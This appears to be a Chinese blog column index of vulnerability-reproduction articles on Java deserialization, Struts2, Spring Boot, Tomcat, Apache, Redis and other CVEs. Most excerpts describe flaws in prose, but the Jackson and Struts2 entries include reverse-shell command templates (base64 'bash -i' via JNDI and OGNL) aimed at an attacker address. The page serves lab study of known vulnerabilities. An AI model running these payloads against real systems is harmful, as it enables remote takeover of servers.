漏洞复现
文章平均质量分 86
SuperMan529
少年遥想得山田,请赶在日落下山前。
展开
-
Jackson--FastJson--XStream--代码执行&&反序列化
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,base64反弹shell命令}|{base64,-d}|{bash,-i}” -A 攻击机地址。将xml类型payload替换使用JNDI工具生成的class文件地址发送至目标服务器接受解析。将JRMP监听地址替换xml型payload,抓包发送至目标服务器解析xml格式处。在利用该版本范围时,只能通过项目中所调用的模块和本身类文件来进行利用。原创 2023-10-17 14:50:32 · 152 阅读 · 0 评论 -
Solr Shiro Log4j2 命令执行--文件读取--反序列化--身份权限绕过--命令执行
Apache Velocity是一个基于Java的模板引擎,它提供了一个模板语言去引用由Java代码定义的对象。Velocity是Apache基金会旗下的一个开源软件项目,旨在确保Web应用程序在表示层和业务逻辑层之间的隔离(即MVC设计模式)。Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助自定义的Velocity模板功能,利用Velocity-SSTI漏洞在Solr系统上执行任意代码。原创 2023-10-10 10:57:31 · 176 阅读 · 0 评论 -
Spring Boot 目录遍历--表达式注入--代码执行--(CVE-2021-21234)&&(CVE-2022-22963)&&(CVE-2022-22947)&&(CVE-2022-2296)
spring-boot-actuator-logview 是一个简单的日志文件查看器作为Spring Boot执行器端点,在 0.2.13 版本之前存在着目录遍历漏洞,编号 CVE-2021-21234。漏洞本质是Spring Boot 执行器通过请求的参数来指定文件名和文件夹路径,经过组合拼接达到目录遍历,虽然源码中检查了文件名(filename)参数来防止目录遍历,但是没有检查文件夹(base)参数,造成了目录遍历。原创 2023-09-26 08:45:39 · 378 阅读 · 0 评论 -
thinkphp lang命令执行--struts2 代码执行--(QVD-2022-46174)&&(CVE-2020-17530)&&(CVE-2021-31805)
(%23application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘freemarker.template.utility.Execute’).exec({‘bash -c {echo,反弹shell命令base64编码加url编码}|{base64,-d}|{bash,-i}’}))原创 2023-09-26 08:42:43 · 117 阅读 · 0 评论 -
Jenkins 命令执行 -- jetty 敏感信息泄露 --(CVE-2021-2816)&&(CVE-2017-1000353)&&(CVE-2018-1000861)
对于原创 2023-09-25 10:17:25 · 686 阅读 · 0 评论 -
Tomcat--文件上传--文件包含--(CVE-2017-12615)&&(CVE-2020-1938)
当存在漏洞的Tomcat运行在Windows/Linux主机上, 且启用了HTTP PUT请求方法( 例如, 将readonly初始化参数由默认值设置为false) , 攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的JSP的webshell文件,JSP文件中的恶意代码将能被服务器执行, 导致服务器上的数据泄露或获取服务器权限。原创 2023-09-24 17:39:07 · 99 阅读 · 0 评论 -
Apache(2.4.49 2.4.50)--目录遍历--命令执行--(CVE-2021-42013)&&(CVE-2021-41773)
Apache HTTP Server是美国阿帕奇(Apache)基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点,发现 Apache HTTP Server 2.4.50 中针对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则这可能允许远程代码执行。原创 2023-09-22 16:30:43 · 52 阅读 · 0 评论 -
Couchdb-权限绕过--命令执行--(CVE-2017-12635)&&(CVE-2017-12636)--H2database命令执行--(CVE-2022-23221)
采用Vulfocus靶场环境进行复现,搭建操作和文章参考具体搭建教程参考vulfocus不能同步的解决方法/vulfocus同步失败。Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。原创 2023-09-22 14:21:53 · 118 阅读 · 0 评论 -
Redis漏洞总结--未授权--沙箱绕过--(CNVD-2015-07557)&&(CNVD-2019-21763)&&(CVE-2022-0543)
由于在Reids 4.x及以上版本中新增了模块功能,攻击者可通过外部拓展,在Redis中实现一个新的Redis命令。攻击者可以利用该功能引入模块,在未授权访问的情况下使被攻击服务器加载恶意.so 文件,从而实现远程代码执行。对于Redis服务的未授权访问,首先需要确认Redis未授权是否存在,使用Redis数据库客户端进行连接测试,如何没有密码,即未授权漏洞存在。漏洞利用有三种利用方式,每种方式都有限制条件,本质就是使用Redis数据库操作语句在目标主机进行写入文件。注意:部分没目录权限读写权限。原创 2023-09-22 14:20:59 · 611 阅读 · 0 评论 -
__wakeup()魔术方法绕过(CVE-2016-7124)
在php反序列化数据过程中,如果类中存在__wakeup方法,调用 unserilize() 方法前则先调用__wakeup方法,当序列化字符串中表示对象属性个数的值大于 真实的属性个数时会跳过__wakeup的执行。原创 2023-08-14 17:18:40 · 166 阅读 · 0 评论 -
Nginx 文件名逻辑漏洞(CVE-2013-4547)(Vulhub)
在Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7版本中存在错误解析用户请求的url信息,从而导致文件代码执行,权限绕过等问题。利用该漏洞需要满足Nginx版本满足0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7版本文件上传点可以上传带空格文件名的文件服务器没有做文件重命名。原创 2023-06-20 16:50:58 · 351 阅读 · 0 评论 -
Apache HTTPD 换行解析漏洞(CVE-2017-15715)(Vulhub)
Apache在2.40~2.4.29版本中存在一个换行解析漏洞(\x0A),\x0A是16进制数代表10进制数字的10,在ASCII码中,\n的ASCII码为10。在Apache解析文件时,如果在php文件后缀有\x0A,Apache会忽略它,继续把它当作php来解析,但是在一些服务器的安全策略中,代码并不会忽略它。利用该漏洞需要满足三个条件Apache版本符合具有文件上传点文件名可控。原创 2023-06-20 11:37:24 · 155 阅读 · 0 评论 -
HTTP.SYS远程代码执行漏洞验证及其复现(CVE-2015-1635蓝屏洞)
HTTP.sys是Microsoft Windows处理HTTP请求的内核驱动程序,为了优化IIS服务器性能,从IIS6.0引入,IIS服务进程依赖HTTP.sys。HTTP.sys远程代码执行漏洞实质是HTTP.sys的整数溢出漏洞。原创 2023-06-13 20:51:07 · 3113 阅读 · 3 评论